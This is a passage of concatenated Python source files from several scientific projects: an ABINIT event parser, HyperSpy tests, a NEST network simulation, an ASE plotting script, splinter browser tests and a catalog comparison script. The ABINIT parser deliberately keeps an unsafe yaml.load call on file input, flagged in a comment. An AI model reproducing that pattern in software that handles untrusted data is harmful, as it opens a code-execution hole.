    def correct(self, task):
        """
        Restart the relaxation from the last structure dumped by ABINIT
        in ``DILATMX_STRUCT.nc`` before it aborted.

        Args:
            task: The :class:`Task` that raised the error.

        Returns:
            1 (number of corrections applied).
        """
        # Idea: decrease dilatmx and restart from the last structure.
        # We would like to end up with a structure optimized with dilatmx 1.01
        # that will be used for phonon calculations.

        # Read the last structure dumped by ABINIT before aborting.
        # (Removed leftover debug print that polluted stdout in library code.)
        filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
        last_structure = Structure.from_file(filepath)

        task._change_structure(last_structure)
        #changes = task._modify_vars(dilatmx=1.05)

        task.history.append("Take last structure from DILATMX_STRUCT.nc, will try to restart")
        return 1
# Register the concrete base classes.
# Order matters: AbinitEvent.baseclass returns the FIRST class here for which
# isinstance(event, cls) is true.
_BASE_CLASSES = [
    AbinitComment,
    AbinitError,
    AbinitBug,
    AbinitWarning,
]
class EventReport(collections.Iterable):  # NOTE(review): collections.Iterable was removed in Python 3.10; collections.abc.Iterable is the forward-compatible spelling -- confirm supported versions.
    """
    Iterable storing the events raised by an ABINIT calculation.

    Attributes::

        stat: information about a file as returned by os.stat
    """
    def __init__(self, filename, events=None):
        """
        List of ABINIT events.

        Args:
            filename: Name of the file
            events: List of Event objects
        """
        self.filename = os.path.abspath(filename)
        # File metadata (size, mtime, ...) as returned by os.stat.
        self.stat = os.stat(self.filename)

        self._events = []
        # Events bucketed by concrete base class (Comment/Error/Bug/Warning).
        self._events_by_baseclass = collections.defaultdict(list)

        if events is not None:
            for ev in events:
                self.append(ev)

    def __len__(self):
        return len(self._events)

    def __iter__(self):
        return self._events.__iter__()

    def __str__(self):
        #has_colours = stream_has_colours(stream)
        # Colored output is currently always enabled.
        has_colours = True

        lines = []
        app = lines.append

        app("Events for: %s" % self.filename)
        for i, event in enumerate(self):
            if has_colours:
                app("[%d] %s" % (i+1, colored(event.header, color=event.color)))
                app(indent(event.message, 4))
            else:
                app("[%d] %s" % (i+1, str(event)))

        app("num_errors: %s, num_warnings: %s, num_comments: %s, completed: %s" % (
            self.num_errors, self.num_warnings, self.num_comments, self.run_completed))

        return "\n".join(lines)

    def append(self, event):
        """Add an event to the list."""
        self._events.append(event)
        self._events_by_baseclass[event.baseclass].append(event)

    def set_run_completed(self, bool_value):
        """Set the value of _run_completed."""
        self._run_completed = bool_value

    @property
    def run_completed(self):
        """True if the calculation terminated."""
        try:
            return self._run_completed
        except AttributeError:
            # set_run_completed has never been called.
            return False

    @property
    def comments(self):
        """List of comments found."""
        return self.select(AbinitComment)

    @property
    def errors(self):
        """List of errors found."""
        return self.select(AbinitError)

    @property
    def bugs(self):
        """List of bugs found."""
        return self.select(AbinitBug)

    @property
    def warnings(self):
        """List of warnings found."""
        return self.select(AbinitWarning)

    @property
    def num_warnings(self):
        """Number of warnings reported."""
        return len(self.warnings)

    @property
    def num_errors(self):
        """Number of errors reported."""
        return len(self.errors)

    @property
    def num_comments(self):
        """Number of comments reported."""
        return len(self.comments)

    def select(self, base_class):
        """
        Return the list of events that inherits from class base_class.

        Args:
            base_class: One of the concrete base classes registered in
                ``_BASE_CLASSES``.
        """
        # Slice copy so callers cannot mutate the internal list.
        return self._events_by_baseclass[base_class][:]

    def filter_types(self, event_types):
        """Return a new EventReport keeping only events whose exact type is in event_types."""
        events = []
        for ev in self:
            if type(ev) in event_types: events.append(ev)
        return self.__class__(filename=self.filename, events=events)
class EventsParserError(Exception):
    """Base class for the exceptions raised by :class:`EventsParser`."""
class EventsParser(object):
    """
    Parses the output or the log file produced by abinit and extracts the list of events.
    """
    Error = EventsParserError

    # Internal flag used for debugging
    DEBUG_LEVEL = 0

    def parse(self, filename):
        """
        Parse the given file. Return :class:`EventReport`.
        """
        run_completed = False
        filename = os.path.abspath(filename)
        report = EventReport(filename)

        # TODO Use CamelCase for the Fortran messages.
        # Bug is still an error of class SoftwareError
        w = WildCard("*Error|*Warning|*Comment|*Bug|*ERROR|*WARNING|*COMMENT|*BUG")

        with YamlTokenizer(filename) as tokens:
            for doc in tokens:
                if w.match(doc.tag):
                    try:
                        # NOTE: yaml.load on untrusted input is unsafe; kept
                        # here because the custom yaml_tag classes rely on the
                        # default loader for instantiation.
                        event = yaml.load(doc.text)
                    except Exception:
                        # Use "except Exception" (not a bare except) so that
                        # SystemExit/KeyboardInterrupt still propagate.
                        # Wrong YAML doc: check the doc tag and instantiate the
                        # proper fallback event.
                        message = "Malformatted YAML document at line: %d\n" % doc.lineno
                        message += doc.text

                        # This call is very expensive when we have many
                        # exceptions due to malformatted YAML docs.
                        if self.DEBUG_LEVEL:
                            message += "Traceback:\n %s" % straceback()

                        if "error" in doc.tag.lower():
                            event = AbinitYamlError(message=message, src_file=__file__, src_line=0)
                        else:
                            event = AbinitYamlWarning(message=message, src_file=__file__, src_line=0)

                    event.lineno = doc.lineno
                    report.append(event)

                # Check whether the calculation completed.
                if doc.tag == "!FinalSummary":
                    run_completed = True

        report.set_run_completed(run_completed)
        return report

    def report_exception(self, filename, exc):
        """
        This method is used when self.parser raises an Exception so that
        we can report a customized :class:`EventReport` object with info on the exception.
        """
        # AbinitError requires (message, src_file, src_line); the previous
        # single-argument call raised TypeError when this path was hit.
        return EventReport(filename, events=[AbinitError(str(exc), "Unknown", 0)])
| Dioptas/pymatgen | pymatgen/io/abinitio/events.py | Python | mit | 14,084 | [
"ABINIT",
"pymatgen"
] | 8ce9e7c2d5953d2b033390543f68e6f1ec6b997b7644400dd864a86b0c038051 |
# -*- coding: utf-8 -*-
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import pytest
from hyperspy import signals
from hyperspy import components1d
from hyperspy.decorators import lazifyTestClass
@lazifyTestClass
class TestRemoveBackground1DGaussian:
    """Check that remove_background fully removes a noise-free Gaussian."""

    def setup_method(self, method):
        # Build a noise-free Gaussian peak (A=10, centre=10, sigma=1)
        # sampled on [0, 20) with step 0.01.
        gaussian = components1d.Gaussian()
        gaussian.A.value = 10
        gaussian.centre.value = 10
        gaussian.sigma.value = 1
        self.signal = signals.Signal1D(
            gaussian.function(np.arange(0, 20, 0.01)))
        self.signal.axes_manager[0].scale = 0.01
        self.signal.metadata.Signal.binned = False

    def test_background_remove_gaussian(self):
        # Fitting a Gaussian background to pure Gaussian data must leave zeros.
        s1 = self.signal.remove_background(
            signal_range=(None, None),
            background_type='Gaussian',
            show_progressbar=None)
        assert np.allclose(s1.data, np.zeros(len(s1.data)))

    def test_background_remove_gaussian_full_fit(self):
        # Same check via the non-fast (full fit) code path.
        s1 = self.signal.remove_background(
            signal_range=(None, None),
            background_type='Gaussian',
            fast=False)
        assert np.allclose(s1.data, np.zeros(len(s1.data)))
@lazifyTestClass
class TestRemoveBackground1DPowerLaw:
    """Check remove_background on power-law data, with and without noise."""

    def setup_method(self, method):
        # Noise-free power law (A=1e10, r=3) sampled on [100, 200).
        pl = components1d.PowerLaw()
        pl.A.value = 1e10
        pl.r.value = 3
        self.signal = signals.Signal1D(
            pl.function(np.arange(100, 200)))
        self.signal.axes_manager[0].offset = 100
        self.signal.metadata.Signal.binned = False
        # Noisy copy exercised by the zero_fill tests.
        self.signal_noisy = self.signal.deepcopy()
        self.signal_noisy.add_gaussian_noise(1)
        # Absolute tolerances: 4% of the maximum absolute signal value.
        self.atol = 0.04 * abs(self.signal.data).max()
        self.atol_zero_fill = 0.04 * abs(self.signal.isig[10:].data).max()

    def test_background_remove_pl(self):
        s1 = self.signal.remove_background(
            signal_range=(None, None),
            background_type='PowerLaw',
            show_progressbar=None)
        # since we compare to zero, rtol can't be used (see np.allclose doc)
        assert np.allclose(s1.data, np.zeros(len(s1.data)), atol=self.atol)
        assert s1.axes_manager.navigation_dimension == 0

    def test_background_remove_pl_zero(self):
        # zero_fill=True must zero out the region before the signal_range.
        s1 = self.signal_noisy.remove_background(
            signal_range=(110.0, 190.0),
            background_type='PowerLaw',
            zero_fill=True,
            show_progressbar=None)
        # since we compare to zero, rtol can't be used (see np.allclose doc)
        assert np.allclose(s1.isig[10:], np.zeros(len(s1.data[10:])),
                           atol=self.atol_zero_fill)
        assert np.allclose(s1.data[:10], np.zeros(10))

    def test_background_remove_pl_int(self):
        # Same as test_background_remove_pl but with integer-typed data.
        self.signal.change_dtype("int")
        s1 = self.signal.remove_background(
            signal_range=(None, None),
            background_type='PowerLaw',
            show_progressbar=None)
        # since we compare to zero, rtol can't be used (see np.allclose doc)
        assert np.allclose(s1.data, np.zeros(len(s1.data)), atol=self.atol)

    def test_background_remove_pl_int_zero(self):
        # Integer-typed data combined with zero_fill=True.
        self.signal_noisy.change_dtype("int")
        s1 = self.signal_noisy.remove_background(
            signal_range=(110.0, 190.0),
            background_type='PowerLaw',
            zero_fill=True,
            show_progressbar=None)
        # since we compare to zero, rtol can't be used (see np.allclose doc)
        assert np.allclose(s1.isig[10:], np.zeros(len(s1.data[10:])),
                           atol=self.atol_zero_fill)
        assert np.allclose(s1.data[:10], np.zeros(10))
def compare_axes_manager_metadata(s0, s1):
    """Assert that two signals share data shape, axis calibration and title."""
    assert s0.data.shape == s1.data.shape
    assert s0.axes_manager.shape == s1.axes_manager.shape
    n_axes = len(s0.axes_manager._axes)
    for i in range(n_axes):
        ax0 = s0.axes_manager[i]
        ax1 = s1.axes_manager[i]
        for attr in ('name', 'units', 'scale', 'offset'):
            assert getattr(ax0, attr) == getattr(ax1, attr)
    assert s0.metadata.General.title == s1.metadata.General.title
@pytest.mark.parametrize('nav_dim', [0, 1])
@pytest.mark.parametrize('fast', [True, False])
@pytest.mark.parametrize('zero_fill', [True, False])
@pytest.mark.parametrize('show_progressbar', [True, False])
@pytest.mark.parametrize('plot_remainder', [True, False])
@pytest.mark.parametrize('background_type',
                         ['Power Law', 'Polynomial', 'Offset'])
def test_remove_background_metadata_axes_manager_copy(nav_dim,
                                                      fast,
                                                      zero_fill,
                                                      show_progressbar,
                                                      plot_remainder,
                                                      background_type):
    """remove_background must copy axis calibration and metadata to the
    result for every combination of options (checked via
    compare_axes_manager_metadata)."""
    # Decreasing ramp data, with or without a navigation dimension.
    if nav_dim == 0:
        s = signals.Signal1D(np.arange(10, 100)[::-1])
    else:
        s = signals.Signal1D(np.arange(10, 210)[::-1].reshape(2, 100))
    # Non-default calibration and title so that the copy is actually exercised.
    s.axes_manager[0].name = 'axis0'
    s.axes_manager[0].units = 'units0'
    s.axes_manager[0].scale = 0.9
    s.axes_manager[0].offset = 1.
    s.metadata.General.title = "atitle"
    s_r = s.remove_background(signal_range=(2, 50),
                              fast=fast,
                              zero_fill=zero_fill,
                              show_progressbar=show_progressbar,
                              plot_remainder=plot_remainder,
                              background_type=background_type)
    compare_axes_manager_metadata(s, s_r)
| MartialD/hyperspy | hyperspy/tests/signal/test_remove_background.py | Python | gpl-3.0 | 6,248 | [
"Gaussian"
] | dcefc42632ef2d1d9a157be0d6ef8830ee5e43a4bcf58f07852aca1ed1bb32d7 |
# -*- coding: utf-8 -*-
#
# brunel_alpha_nest.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Random balanced network (alpha synapses) connected with NEST
------------------------------------------------------------------
This script simulates an excitatory and an inhibitory population on
the basis of the network used in [1]
In contrast to brunel-alpha-numpy.py, this variant uses NEST's builtin
connection routines to draw the random connections instead of NumPy.
When connecting the network customary synapse models are used, which
allow for querying the number of created synapses. Using spike
detectors the average firing rates of the neurons in the populations
are established. The building as well as the simulation time of the
network are recorded.
References
~~~~~~~~~~~~~
.. [1] Brunel N, Dynamics of Sparsely Connected Networks of Excitatory and
Inhibitory Spiking Neurons, Journal of Computational Neuroscience 8,
183-208 (2000).
See Also
~~~~~~~~~~~~
brunel-alpha-numpy.py
:Authors:
KEYWORDS:
"""
###############################################################################
# Import all necessary modules for simulation, analysis and plotting. Scipy
# should be imported before nest.
from scipy.optimize import fsolve
import nest
import nest.raster_plot
import time
from numpy import exp
###############################################################################
# Definition of functions used in this example. First, define the Lambert W
# function implemented in SLI. The second function computes the maximum of
# the postsynaptic potential for a synaptic input current of unit amplitude (
# 1 pA) using the Lambert W function. This function will later be used to
# calibrate the synaptic weights.
def LambertWm1(x):
    """Evaluate the Lambert W function (Wm1 branch) of ``x`` via NEST's SLI."""
    # Push the argument onto the SLI stack, run the SLI ``LambertWm1``
    # command, then pop the result back into Python.
    nest.ll_api.sli_push(x)
    nest.ll_api.sli_run('LambertWm1')
    y = nest.ll_api.sli_pop()
    return y
def ComputePSPnorm(tauMem, CMem, tauSyn):
    """Return the peak of the PSP evoked by a unit-amplitude (1 pA) current.

    The time of the maximum is obtained analytically with the Lambert W
    function; the returned peak value is later used to calibrate the
    synaptic weights.

    Parameters: tauMem -- membrane time constant (ms); CMem -- membrane
    capacitance (pF); tauSyn -- synaptic (alpha) time constant (ms).
    """
    tau_ratio = (tauMem / tauSyn)
    rate_diff = (1.0 / tauSyn - 1.0 / tauMem)

    # Analytical time of the PSP maximum.
    t_peak = 1.0 / rate_diff * (-LambertWm1(-exp(-1.0 / tau_ratio) / tau_ratio)
                                - 1.0 / tau_ratio)

    # PSP amplitude at the peak for a current of unit amplitude.
    peak = (exp(1.0) / (tauSyn * CMem * rate_diff) *
            ((exp(-t_peak / tauMem) - exp(-t_peak / tauSyn)) / rate_diff -
             t_peak * exp(-t_peak / tauSyn)))
    return peak
nest.ResetKernel()
###############################################################################
# Assigning the current time to a variable in order to determine the build
# time of the network.
startbuild = time.time()
###############################################################################
# Assigning the simulation parameters to variables.
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
###############################################################################
# Definition of the parameters crucial for asynchronous irregular firing of
# the neurons.
g = 5.0 # ratio inhibitory weight/excitatory weight
eta = 2.0 # external rate relative to threshold rate
epsilon = 0.1 # connection probability
###############################################################################
# Definition of the number of neurons in the network and the number of neuron
# recorded from
order = 2500
NE = 4 * order # number of excitatory neurons
NI = 1 * order # number of inhibitory neurons
N_neurons = NE + NI # number of neurons in total
N_rec = 50 # record from 50 neurons
###############################################################################
# Definition of connectivity parameter
CE = int(epsilon * NE) # number of excitatory synapses per neuron
CI = int(epsilon * NI) # number of inhibitory synapses per neuron
C_tot = int(CI + CE) # total number of synapses per neuron
###############################################################################
# Initialization of the parameters of the integrate and fire neuron and the
# synapses. The parameter of the neuron are stored in a dictionary. The
# synaptic currents are normalized such that the amplitude of the PSP is J.
tauSyn = 0.5 # synaptic time constant in ms
tauMem = 20.0 # time constant of membrane potential in ms
CMem = 250.0 # capacitance of membrane in in pF
theta = 20.0 # membrane threshold potential in mV
neuron_params = {"C_m": CMem,
"tau_m": tauMem,
"tau_syn_ex": tauSyn,
"tau_syn_in": tauSyn,
"t_ref": 2.0,
"E_L": 0.0,
"V_reset": 0.0,
"V_m": 0.0,
"V_th": theta}
J = 0.1 # postsynaptic amplitude in mV
J_unit = ComputePSPnorm(tauMem, CMem, tauSyn)
J_ex = J / J_unit # amplitude of excitatory postsynaptic current
J_in = -g * J_ex # amplitude of inhibitory postsynaptic current
###############################################################################
# Definition of threshold rate, which is the external rate needed to fix the
# membrane potential around its threshold, the external firing rate and the
# rate of the poisson generator which is multiplied by the in-degree CE and
# converted to Hz by multiplication by 1000.
nu_th = (theta * CMem) / (J_ex * CE * exp(1) * tauMem * tauSyn)
nu_ex = eta * nu_th
p_rate = 1000.0 * nu_ex * CE
###############################################################################
# Configuration of the simulation kernel by the previously defined time
# resolution used in the simulation. Setting "print_time" to True prints the
# already processed simulation time as well as its percentage of the total
# simulation time.
nest.SetKernelStatus({"resolution": dt, "print_time": True,
"overwrite_files": True})
print("Building network")
###############################################################################
# Configuration of the model `iaf_psc_alpha` and `poisson_generator` using
# SetDefaults(). This function expects the model to be the inserted as a
# string and the parameter to be specified in a dictionary. All instances of
# theses models created after this point will have the properties specified
# in the dictionary by default.
nest.SetDefaults("iaf_psc_alpha", neuron_params)
nest.SetDefaults("poisson_generator", {"rate": p_rate})
###############################################################################
# Creation of the nodes using `Create`. We store the returned handles in
# variables for later reference. Here the excitatory and inhibitory, as well
# as the poisson generator and two spike detectors. The spike detectors will
# later be used to record excitatory and inhibitory spikes.
nodes_ex = nest.Create("iaf_psc_alpha", NE)
nodes_in = nest.Create("iaf_psc_alpha", NI)
noise = nest.Create("poisson_generator")
espikes = nest.Create("spike_detector")
ispikes = nest.Create("spike_detector")
###############################################################################
# Configuration of the spike detectors recording excitatory and inhibitory
# spikes using `SetStatus`, which expects a list of node handles and a list
# of parameter dictionaries. Setting the variable "to_file" to True ensures
# that the spikes will be recorded in a .gdf file starting with the string
# assigned to label. Setting "withtime" and "withgid" to True ensures that
# each spike is saved to file by stating the gid of the spiking neuron and
# the spike time in one line.
nest.SetStatus(espikes, [{"label": "brunel-py-ex",
"withtime": True,
"withgid": True,
"to_file": True}])
nest.SetStatus(ispikes, [{"label": "brunel-py-in",
"withtime": True,
"withgid": True,
"to_file": True}])
print("Connecting devices")
###############################################################################
# Definition of a synapse using `CopyModel`, which expects the model name of
# a pre-defined synapse, the name of the customary synapse and an optional
# parameter dictionary. The parameters defined in the dictionary will be the
# default parameter for the customary synapse. Here we define one synapse for
# the excitatory and one for the inhibitory connections giving the
# previously defined weights and equal delays.
nest.CopyModel("static_synapse", "excitatory",
{"weight": J_ex, "delay": delay})
nest.CopyModel("static_synapse", "inhibitory",
{"weight": J_in, "delay": delay})
###############################################################################
# Connecting the previously defined poisson generator to the excitatory and
# inhibitory neurons using the excitatory synapse. Since the poisson
# generator is connected to all neurons in the population the default rule (
# 'all_to_all') of Connect() is used. The synaptic properties are inserted
# via syn_spec which expects a dictionary when defining multiple variables or
# a string when simply using a pre-defined synapse.
nest.Connect(noise, nodes_ex, syn_spec="excitatory")
nest.Connect(noise, nodes_in, syn_spec="excitatory")
###############################################################################
# Connecting the first N_rec nodes of the excitatory and inhibitory
# population to the associated spike detectors using excitatory synapses.
# Here the same shortcut for the specification of the synapse as defined
# above is used.
nest.Connect(nodes_ex[:N_rec], espikes, syn_spec="excitatory")
nest.Connect(nodes_in[:N_rec], ispikes, syn_spec="excitatory")
print("Connecting network")
print("Excitatory connections")
###############################################################################
# Connecting the excitatory population to all neurons using the pre-defined
# excitatory synapse. Beforehand, the connection parameter are defined in a
# dictionary. Here we use the connection rule 'fixed_indegree',
# which requires the definition of the indegree. Since the synapse
# specification is reduced to assigning the pre-defined excitatory synapse it
# suffices to insert a string.
conn_params_ex = {'rule': 'fixed_indegree', 'indegree': CE}
nest.Connect(nodes_ex, nodes_ex + nodes_in, conn_params_ex, "excitatory")
print("Inhibitory connections")
###############################################################################
# Connecting the inhibitory population to all neurons using the pre-defined
# inhibitory synapse. The connection parameter as well as the synapse
# paramtere are defined analogously to the connection from the excitatory
# population defined above.
conn_params_in = {'rule': 'fixed_indegree', 'indegree': CI}
nest.Connect(nodes_in, nodes_ex + nodes_in, conn_params_in, "inhibitory")
###############################################################################
# Storage of the time point after the buildup of the network in a variable.
endbuild = time.time()
###############################################################################
# Simulation of the network.
print("Simulating")
nest.Simulate(simtime)
###############################################################################
# Storage of the time point after the simulation of the network in a variable.
endsimulate = time.time()
###############################################################################
# Reading out the total number of spikes received from the spike detector
# connected to the excitatory population and the inhibitory population.
events_ex = nest.GetStatus(espikes, "n_events")[0]
events_in = nest.GetStatus(ispikes, "n_events")[0]
###############################################################################
# Calculation of the average firing rate of the excitatory and the inhibitory
# neurons by dividing the total number of recorded spikes by the number of
# neurons recorded from and the simulation time. The multiplication by 1000.0
# converts the unit 1/ms to 1/s=Hz.
rate_ex = events_ex / simtime * 1000.0 / N_rec
rate_in = events_in / simtime * 1000.0 / N_rec
###############################################################################
# Reading out the number of connections established using the excitatory and
# inhibitory synapse model. The numbers are summed up resulting in the total
# number of synapses.
num_synapses = (nest.GetDefaults("excitatory")["num_connections"] +
nest.GetDefaults("inhibitory")["num_connections"])
###############################################################################
# Establishing the time it took to build and simulate the network by taking
# the difference of the pre-defined time variables.
build_time = endbuild - startbuild
sim_time = endsimulate - endbuild
###############################################################################
# Printing the network properties, firing rates and building times.
print("Brunel network simulation (Python)")
print("Number of neurons : {0}".format(N_neurons))
print("Number of synapses: {0}".format(num_synapses))
print(" Exitatory : {0}".format(int(CE * N_neurons) + N_neurons))
print(" Inhibitory : {0}".format(int(CI * N_neurons)))
print("Excitatory rate : %.2f Hz" % rate_ex)
print("Inhibitory rate : %.2f Hz" % rate_in)
print("Building time : %.2f s" % build_time)
print("Simulation time : %.2f s" % sim_time)
###############################################################################
# Plot a raster of the excitatory neurons and a histogram.
nest.raster_plot.from_device(espikes, hist=True)
| terhorstd/nest-simulator | pynest/examples/brunel_alpha_nest.py | Python | gpl-2.0 | 14,139 | [
"NEURON"
] | 35cdb120e4f613c75c68d3b5da606441e6f62f1b3d5e564f0af3ca49661653e9 |
from ase import io

# Render every frame of the trajectory to a numbered PNG, viewed along the
# original z axis and repeated 3x3 in the periodic (y, z) directions.
trajectory = io.read('mytrajectory.traj')

for index, atoms in enumerate(trajectory):
    # rotate to the desired direction
    atoms.rotate('z', 'x', rotate_cell=True)

    # Repeat the structure but restore the single-image cell afterwards, so
    # the drawn unit cell outline matches the original frame.
    original_cell = atoms.get_cell()
    atoms = atoms.repeat((1, 3, 3))
    atoms.set_cell(original_cell)

    outfile = '%d.png' % index
    print('writing', outfile)
    io.write(outfile, atoms,
             show_unit_cell=True,
             bbox=[-3, -5, 50, 22])  # set bbox by hand, try and error
| misdoro/python-ase | doc/development/writepngs.py | Python | gpl-2.0 | 456 | [
"ASE"
] | fbf7a6925ab123681242b2b20eea53c5e67fe4bc29dd27257679e6c4bc69dacd |
# -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
    """Return True if a Chrome webdriver can be started on this machine.

    Starts a probe browser and, on success, quits it again so the probe does
    not leak a Chrome/chromedriver process (the original never closed it).
    """
    try:
        browser = Browser("chrome")
    except WebDriverException:
        return False
    browser.quit()
    return True
@unittest.skipIf(not chrome_installed(), 'chrome is not installed')
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
    """Runs the shared WebDriverTests suite against a real Chrome browser."""

    @classmethod
    def setUpClass(cls):
        # One shared browser instance for the whole class keeps the suite fast.
        cls.browser = Browser("chrome")

    @classmethod
    def tearDownClass(cls):
        cls.browser.quit()

    def setUp(self):
        # Every test starts from the example application's front page.
        self.browser.visit(EXAMPLE_APP)

    def test_attach_file(self):
        "should provide a way to change file field value"
        file_path = os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            'mockfile.txt'
        )
        self.browser.attach_file('file', file_path)
        self.browser.find_by_name('upload').click()

        html = self.browser.html
        # NOTE(review): these membership tests mix bytes and str -- they only
        # work if browser.html is bytes here; with a Python 3 str they raise
        # TypeError. Confirm the html type for this splinter version.
        assert b'text/plain' in html
        assert open(file_path).read().encode('utf-8') in html

    def test_should_support_with_statement(self):
        "should be usable as a context manager (quits the browser on exit)"
        with Browser('chrome') as internet:
            pass
@unittest.skipIf(not chrome_installed(), 'chrome is not installed')
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
    """Runs the shared WebDriverTests suite against Chrome in fullscreen mode."""

    @classmethod
    def setUpClass(cls):
        # Same suite as ChromeBrowserTest, only with fullscreen=True.
        cls.browser = Browser("chrome", fullscreen=True)

    @classmethod
    def tearDownClass(cls):
        cls.browser.quit()

    def setUp(self):
        # Every test starts from the example application's front page.
        self.browser.visit(EXAMPLE_APP)

    def test_should_support_with_statement(self):
        "should be usable as a context manager (quits the browser on exit)"
        with Browser('chrome', fullscreen=True) as internet:
            pass
| lrowe/splinter | tests/test_webdriver_chrome.py | Python | bsd-3-clause | 1,916 | [
"VisIt"
] | 8f02e8701b0b967c77fda81b589dc529357d87636d921a630ad24bcfc71f65f7 |
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import numpy as np
from glob import glob
import os
import re
from astrometry.util.fits import fits_table, merge_tables
from astrometry.libkd.spherematch import match_radec
from astrometry.util.plotutils import PlotSequence
from tractor.brightness import NanoMaggies
import scipy.stats
'''
This is a little script for comparing two directories full of tractor
catalogs.
'''
def main():
    """Cross-match two directories of tractor catalogs and plot comparisons.

    Command-line arguments name the two catalog directories plus optional
    labels, plot-filename prefix and match radius.  Produces (via
    PlotSequence): match-distance histogram, source-type confusion matrix,
    dchisq and radius comparisons, per-band flux/magnitude comparisons and
    error-normalized difference histograms.

    Bug fixes relative to the original: matched catalog types are stripped
    of padding below, so the later selections compare against 'PSF' (the
    padded 'PSF ' could never match); the argparse help string now uses
    %(default)s (argparse ignores optparse-style "%default"); the catalog
    filename regex escapes the '.' before 'fits'.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--name1', help='Name for first data set')
    parser.add_argument('--name2', help='Name for second data set')
    parser.add_argument('--plot-prefix', default='compare',
                        help='Prefix for plot filenames; default "%(default)s"')
    parser.add_argument('--match', default=1.0, type=float,
                        help='Astrometric cross-match distance in arcsec')
    parser.add_argument('dir1', help='First directory to compare')
    parser.add_argument('dir2', help='Second directory to compare')
    opt = parser.parse_args()

    ps = PlotSequence(opt.plot_prefix)

    # Default the data-set labels to the directory basenames (falling back to
    # the parent directory when the path ends with a slash).
    name1 = opt.name1
    if name1 is None:
        name1 = os.path.basename(opt.dir1)
        if not len(name1):
            name1 = os.path.basename(os.path.dirname(opt.dir1))
    name2 = opt.name2
    if name2 is None:
        name2 = os.path.basename(opt.dir2)
        if not len(name2):
            name2 = os.path.basename(os.path.dirname(opt.dir2))
    tt = 'Comparing %s to %s' % (name1, name2)

    # regex for tractor-*.fits catalog filename ('.' escaped before "fits")
    catre = re.compile(r'tractor-.*\.fits')

    # Recursively collect and merge all tractor catalogs under each directory.
    cat1,cat2 = [],[]
    for basedir,cat in [(opt.dir1, cat1), (opt.dir2, cat2)]:
        for dirpath,dirnames,filenames in os.walk(basedir, followlinks=True):
            for fn in filenames:
                if not catre.match(fn):
                    print('Skipping', fn, 'due to filename')
                    continue
                fn = os.path.join(dirpath, fn)
                t = fits_table(fn)
                print(len(t), 'from', fn)
                cat.append(t)
    cat1 = merge_tables(cat1, columns='fillzero')
    cat2 = merge_tables(cat2, columns='fillzero')
    print('Total of', len(cat1), 'from', name1)
    print('Total of', len(cat2), 'from', name2)
    # Keep only the unique (brick-primary) sources.
    cat1.cut(cat1.brick_primary)
    cat2.cut(cat2.brick_primary)
    print('Total of', len(cat1), 'BRICK_PRIMARY from', name1)
    print('Total of', len(cat2), 'BRICK_PRIMARY from', name2)

    # cat1.cut((cat1.decam_anymask[:,1] == 0) *
    #          (cat1.decam_anymask[:,2] == 0) *
    #          (cat1.decam_anymask[:,4] == 0))
    # cat2.cut((cat2.decam_anymask[:,1] == 0) *
    #          (cat2.decam_anymask[:,2] == 0) *
    #          (cat2.decam_anymask[:,4] == 0))
    # print('Total of', len(cat1), 'unmasked from', name1)
    # print('Total of', len(cat2), 'unmasked from', name2)

    # Nearest-neighbor astrometric cross-match within opt.match arcsec.
    I,J,d = match_radec(cat1.ra, cat1.dec, cat2.ra, cat2.dec, opt.match/3600.,
                        nearest=True)
    print(len(I), 'matched')

    plt.clf()
    plt.hist(d * 3600., 100)
    plt.xlabel('Match distance (arcsec)')
    plt.title(tt)
    ps.savefig()

    matched1 = cat1[I]
    matched2 = cat2[J]

    # Normalize the (blank-padded) type strings once; all comparisons below
    # must therefore use the unpadded values ('PSF', not 'PSF ').
    matched1.type = np.array([t.strip() for t in matched1.type])
    matched2.type = np.array([t.strip() for t in matched2.type])

    # Confusion matrix for source types
    types = ['PSF', 'SIMP', 'EXP', 'DEV', 'COMP']
    confusion = np.zeros((len(types), len(types)))
    labels = []
    assert(len(set(np.unique(matched1.type)) - set(types)) == 0)
    assert(len(set(np.unique(matched2.type)) - set(types)) == 0)
    for i,t1 in enumerate(types):
        I = np.flatnonzero(matched1.type == t1)
        if len(I) == 0:
            continue
        for j,t2 in enumerate(types):
            J = np.flatnonzero(matched2.type[I] == t2)
            if len(J) == 0:
                continue
            confusion[i, j] = float(len(J)) / float(len(I))
            labels.append((i, j, '%i/%i' % (len(J), len(I))))

    plt.clf()
    plt.imshow(confusion, interpolation='nearest', cmap=plt.cm.Blues, vmin=0, vmax=1)
    for r,c,s in labels:
        plt.text(c, r, s, color='k', ha='center', fontsize=8)
    plt.xticks(range(len(types)), types)
    plt.yticks(range(len(types)), types)
    plt.ylabel(name1)
    plt.xlabel(name2)
    ps.savefig()

    # Model-selection comparison: dchisq(PSF) - dchisq(SIMP) in each catalog,
    # split by how the source was classified in each.
    plt.clf()
